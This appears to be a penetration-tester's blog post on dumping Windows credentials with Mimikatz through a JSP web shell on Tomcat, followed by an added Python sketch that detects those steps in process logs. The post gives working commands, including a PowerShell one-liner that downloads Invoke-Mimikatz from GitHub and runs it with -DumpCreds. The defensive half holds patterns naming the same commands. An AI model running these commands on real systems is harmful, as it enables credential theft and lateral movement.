Whiteboard Wednesday: Using Mimikatz From a JSP shell

A while back I was messing around with Tomcat, and it got me thinking: when I come across Tomcat during assessments, it is normally running as SYSTEM or some kind of admin account. Sometimes I don't want to or can't use Metasploit and I just have the web shell. I could create a user and log in that way, but one of the first things I would do is run Mimikatz, so why not just do it from the web shell? Nothing is stopping you, really, so I compiled some commands that would let me run the Invoke-Mimikatz PowerShell cmdlet. Later I decided to automate the commands in a JSP file going forward, which I did, and it can be found here


So here is a quick run-through of what I was doing:

1. Determine the architecture, because if the system is x64 and Tomcat is x86, the PowerShell launched will be 32-bit and Invoke-Mimikatz won't work since it can't read the 64-bit lsass process. The way I did this was a quick registry query; the command is:

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

2. Find the appropriate install of PowerShell if it is a 64-bit system. According to multiple sources, the 64-bit PowerShell should be at


but none of the systems I tested on had PowerShell there, so I had to go looking for it. After some poking around I noticed that on all of my 64-bit test systems there was a folder that started with


followed by hashes and version information that had the 64-bit PowerShell, which I could call. The command I use to find the PowerShell exe is:

dir /S %windir%\powershell.exe

3. After the appropriate PowerShell instance is found, I then run the Invoke-Mimikatz.ps1 file by executing it after downloading it from either GitHub

or a local copy if you can't reach external addresses, by using:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
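Seen from the defender's side, the three steps above leave a recognizable process-creation trail under the Tomcat service. The following detection sketch is an added example, not code from the original post; it assumes process-creation logging with command lines (for example Sysmon Event ID 1 or Security event 4688) exported as host, parent image and command line, and the parent-image names, host names and sample events are constructed.

```python
import re
from collections import defaultdict

# Assumption: the servlet container appears as one of these parent images.
TOMCAT_PARENTS = re.compile(r"\\(tomcat\d*w?|javaw?)\.exe$", re.I)

# One pattern per step of the run-through above.
STAGES = {
    "arch_check": re.compile(r"\breg(\.exe)?\s+query\b.*PROCESSOR_ARCHITECTURE", re.I),
    "powershell_search": re.compile(r"\bdir\s+/s\b.*powershell\.exe", re.I),
    "download_cradle": re.compile(r"powershell.*(DownloadString|Invoke-Mimikatz)", re.I),
}

def classify(parent_image, command_line):
    """Return the stages matched by one process-creation event."""
    if not TOMCAT_PARENTS.search(parent_image):
        return []  # not spawned by the web server; out of scope for this rule
    return [name for name, rx in STAGES.items() if rx.search(command_line)]

def triage(events):
    """Group matches per host; several stages on one host raise the severity."""
    hits = defaultdict(set)
    for host, parent_image, command_line in events:
        hits[host].update(classify(parent_image, command_line))
    return {
        host: {"stages": sorted(s), "severity": "high" if len(s) > 1 else "medium"}
        for host, s in hits.items() if s
    }

# Constructed sample events (host, parent image, command line); not real telemetry.
ENV_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
TOMCAT = r"C:\Program Files\Apache Software Foundation\Tomcat 9.0\bin\Tomcat9.exe"
SAMPLE_EVENTS = [
    ("WEB01", TOMCAT, f'cmd.exe /c reg query "{ENV_KEY}" /v PROCESSOR_ARCHITECTURE'),
    ("WEB01", TOMCAT, r"cmd.exe /c dir /S %windir%\powershell.exe"),
    ("WEB01", TOMCAT, "cmd.exe /c powershell IEX (...DownloadString(<url>)); Invoke-Mimikatz -DumpCreds"),
    ("WEB02", r"C:\Java\bin\java.exe", f'cmd.exe /c reg query "{ENV_KEY}" /v PROCESSOR_ARCHITECTURE'),
    ("DEV03", r"C:\Windows\explorer.exe", r"cmd.exe /k dir /S C:\Windows\powershell.exe"),
]

if __name__ == "__main__":
    for host, result in triage(SAMPLE_EVENTS).items():
        print(host, result["severity"], result["stages"])
```

A web server process that spawns a shell at all is already worth alerting on; the stage patterns here only add context about how far the activity progressed.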
